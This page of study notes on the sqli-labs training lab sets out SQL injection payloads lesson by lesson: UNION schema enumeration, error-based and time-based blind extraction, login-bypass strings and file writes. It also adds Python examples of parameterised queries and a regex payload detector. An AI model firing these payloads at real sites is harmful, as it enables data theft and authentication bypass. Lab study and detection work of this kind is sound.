Sqli labs study notes

2025-02-25 Update From: SLTechnology News&Howtos

Shulou(Shulou.com)06/01 Report--

Lesson01:

Character injection (the parameter is wrapped in single quotes)

Add ?id=5' and '1 in the address bar: the page still loads normally, because the trailing '1 is closed by the quote that the original statement already has after the value.

Add ?id=5' <statement> -- + in the address bar (a crafted SQL statement goes in the middle): the page loads normally because -- comments out the rest of the original query (comment method).

Lesson02:

Numeric injection (the parameter is inserted without quotes)

id=5-2 returns the same result as id=3, which shows the parameter is evaluated as a number, i.e. numeric injection.

id=2 <statement> -- + (a crafted SQL statement goes in the middle)

PS: some queries end with limit 0,1, so only the first row of the result is returned. In that case, make the normal id value invalid (one that matches no row) so that the only row left in the result set is the one produced by the statement we constructed.
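The two probes from Lesson01 and Lesson02 (a closed quote that keeps the condition true, and 5-2 returning the same row as 3), run against a vulnerable query and a parameterised one. This is an added example, not code from the lab or the notes; it uses Python's sqlite3 as a stand-in for MySQL and a constructed users table.

```python
import sqlite3

def make_db():
    # Constructed in-memory stand-in for the lab's users table; rows are sample data, not sqli-labs'.
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users(id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES(?,?,?)",
                     [(1, "Dumb", "Dumb"), (3, "Dummy", "p@ssword"), (5, "stupid", "stupidity")])
    return conn

def lookup_char_vuln(conn, id_param):
    # Lesson01 shape: the value is spliced into a single-quoted literal, so a quote in the
    # input ends the literal early ("5' and '1" or "5' -- ").
    sql = f"SELECT username FROM users WHERE id='{id_param}' LIMIT 1"
    return conn.execute(sql).fetchone()

def lookup_num_vuln(conn, id_param):
    # Lesson02 shape: the value is spliced in bare, so "5-2" is arithmetic evaluated by the DB
    # and returns the same row as "3".
    sql = f"SELECT username FROM users WHERE id={id_param} LIMIT 1"
    return conn.execute(sql).fetchone()

def lookup_safe(conn, id_param):
    # Hardened: validate the expected type, then bind; the input is data, never SQL text.
    if not str(id_param).isdigit():
        raise ValueError("id must be a non-negative integer")
    sql = "SELECT username FROM users WHERE id=? LIMIT 1"
    return conn.execute(sql, (int(id_param),)).fetchone()

def numeric_injection_suspected(fetch):
    # The Lesson02 probe from the notes: if id=5-2 returns what id=3 returns, the parameter
    # is being evaluated as a number. With the quoted query, '5-2' is a string and matches nothing.
    return fetch("5-2") is not None and fetch("5-2") == fetch("3")

if __name__ == "__main__":
    db = make_db()
    print(lookup_char_vuln(db, "5' and '1"))                              # ('stupid',)
    print(numeric_injection_suspected(lambda v: lookup_num_vuln(db, v)))   # True
    print(numeric_injection_suspected(lambda v: lookup_char_vuln(db, v)))  # False
    try:
        lookup_safe(db, "5' and '1")
    except ValueError as e:
        print("rejected:", e)
```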

Lesson03:

id=5 and 1=1 and id=5 and 1=2 produce the same page, so the parameter is not evaluated as a number.

id=3'

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '') LIMIT 0,1' at line 1

The error shows a ) after the value in the original SQL statement (the value is wrapped as ('...')), so the payload has to close both the quote and the parenthesis by supplying its own ').

Usage: 1. id=1') and ('1

2. id=1') <statement> -- +

Lesson04:

Character query based on double quotation marks, similar to Lesson03 (the value is wrapped as ("...")).

1. order by N: find the number of columns in the query.

2. database(): the current database name.

3. user(): the current user.

4. information_schema.tables stores the names of all tables (MySQL).

5. union select 1,table_name,3 from information_schema.tables where table_schema='security' limit 0,1-- +

This lists which tables are in the database; the result shows up in whichever column the page echoes.

6. union select 1,column_name,3 from information_schema.columns where table_name='users' limit 0,1-- + queries the names of the columns (field names) in the users table, one per limit offset.

7. union select 1,group_concat(column_name),3 from information_schema.columns where table_name='users' and table_schema="security"-- +

Alternatively, group_concat(column_name) returns all the field names in one row.

Lesson05&06:

Error-based injection:

and (select 1 from (select count(*),concat(0x3a,0x3a,database(),0x3a,0x3a,floor(rand()*2)) a from information_schema.tables group by a) b)-- +

rand() returns a floating-point random number between 0 and 1

floor() rounds down to an integer

group by groups the rows by the given expression

concat() string concatenation

count() row count

1.

(select count(*),concat(0x3a,0x3a,database(),0x3a,0x3a,floor(rand()*2)) a

This gives the concatenated expression concat(0x3a,0x3a,database(),0x3a,0x3a,floor(rand()*2)) the alias a.

2.

(select count(*),concat(0x3a,0x3a,database(),0x3a,0x3a,floor(rand()*2)) a from information_schema.tables group by a) b

This gives the derived table (select count(*),concat(...) a from information_schema.tables group by a) the alias b.

3.

and (select 1 from (select count(*),concat(0x3a,0x3a,(select table_name from information_schema.tables where table_schema=database() limit 0,1),0x3a,0x3a,floor(rand()*2)) a from information_schema.tables group by a) b)-- +

This statement returns the name of a table through the error message, because the grouped value is echoed in the duplicate-key error.

Lesson07:

select * from table into outfile '/path/filename'

Writing a file this way requires the FILE privilege and is limited by the server's secure_file_priv setting (set to NULL it disables file import and export altogether), which is the server-side control to check.

Lesson08:

Boolean-based blind injection:

substr(string, x, y) takes y characters of the string starting at position x

ascii(char) returns the ASCII code of the character

Lesson09&10:

Time-based blind injection: using time functions, we can tell whether a guess is correct by controlling how long the response takes. Since the page's return value is always the same (always "true"), the only signal is the time difference.

sleep(n) makes the query pause for n seconds

if(1, 2, 3): if 1 is true then 2, otherwise 3

and (select if(ascii(substr(database(),1,1)), sleep(5), NULL))-- +

Lesson11&12:

POST injection (login form)

The commonly used "universal password": ' or 1=1--

') or 1

'or'='or'

Login: username ' or 1=1 limit 0,1 #, password: anything.

But when using -- + to comment, I don't know why the password must be 'or 1'.

Lesson12 is of this type: ("input")

Lesson13&14:

Error-based injection:

Lesson13: ') <statement> #

Common system functions and variables in MySQL:

user() user name; session_user() user name of the connection; database() database name; version() version

current_user() current user name; @@hostname host name; @@port port; @@datadir database path

@@basedir installation path; @@version_compile_os operating system

Lesson15:

1' or: blind injection

Lesson16:

Blind injection (time-based)

1") or sleep(1)

1") or sleep(1)=0 (because sleep() returns 0); be careful when using or

1.

select username,password from tables where id='input' limit 0,1

' and 1-- +

2.

select username,password from tables where id=input limit 0,1

3.

select username,password from tables where id=('input') limit 0,1

4.

select username,password from tables where id=("input") limit 0,1

5.

?id=1' and (select 1 from (select count(*),concat(0x3a,0x3a,(select column_name from information_schema.columns where table_schema=database() and table_name='users' limit 1),0x3a,0x3a,floor(rand()*2)) a from information_schema.tables group by a) b)-- +

6.

1"-- +

9.

?id=2' and sleep(5)-- +

10.

?id=2" and sleep(5)-- +

?id=2" and if(database()='security',sleep(5),NULL)-- +

11.

uname=ain' union select 1,database()-- &passwd=admin&submit=Submit

13.

The input type is ('input')

uname=') and (select 1 from (select count(*),concat(0x3a,0x3a,(select column_name from information_schema.columns where table_schema=database() and table_name='users' limit 1),0x3a,0x3a,floor(rand()*2)) a from information_schema.tables group by a) b)-- &passwd=admin&submit=Submit
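Seen from the defending side, the payload families in Lessons 05 to 16 above (comment terminators, union enumeration of information_schema, floor(rand()) error-based, sleep() time-based, ascii/substr boolean blind, the "universal password" tautology, into outfile) leave recognisable shapes in the query string or POST body. The triage scanner below is an added example, not the notes' or the lab's code; the signature names, the decoding rule and the sample requests are constructed assumptions.

```python
import re
from urllib.parse import unquote_plus

# Signature families for the payload shapes in these notes (added here; not sqli-labs code).
# Heuristic: meant for triage of access logs and WAF tuning, not a complete detector.
SIGNATURES = {
    "comment-terminator": re.compile(r"--\s|#|/\*"),
    "union-enumeration": re.compile(r"\bunion\b[\s\S]*\bselect\b", re.I),
    "schema-lookup": re.compile(r"information_schema\.(?:tables|columns)", re.I),
    "error-based": re.compile(r"floor\s*\(\s*rand\s*\(", re.I),
    "time-based": re.compile(r"\bsleep\s*\(", re.I),
    "boolean-blind": re.compile(r"\b(?:ascii|substr)\s*\(", re.I),
    "tautology": re.compile(r"\bor\b\s*['\"]?\w*['\"]?\s*=", re.I),
    "file-write": re.compile(r"\binto\s+outfile\b", re.I),
}

def normalise(raw):
    # Decode the way the lab's PHP sees it: %xx and '+' become characters, so "--+" is "-- ".
    # Decode twice to catch one level of double-encoding, then collapse whitespace.
    decoded = unquote_plus(unquote_plus(raw))
    return re.sub(r"\s+", " ", decoded)

def scan(raw):
    # Return the sorted list of signature families that match a query string or POST body.
    text = normalise(raw)
    return sorted(name for name, rx in SIGNATURES.items() if rx.search(text))

# Constructed sample requests (query strings / POST bodies) modelled on the lessons above.
SAMPLES = {
    "benign": "id=1",
    "less05": "id=1%27%20and%20(select%201%20from%20(select%20count(*),concat(0x3a,database(),"
              "0x3a,floor(rand()*2))%20a%20from%20information_schema.tables%20group%20by%20a)%20b)--+",
    "less09": "id=1%27%20and%20sleep(5)--+",
    "less11": "uname=%27or%201%3D1--+&passwd=x&submit=Submit",
}

if __name__ == "__main__":
    for name, raw in SAMPLES.items():
        print(f"{name:7} {scan(raw)}")
```

A request that hits several families at once (comment terminator plus schema lookup plus error-based) is a much stronger signal than any single match, so alert on combinations rather than on the comment pattern alone.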
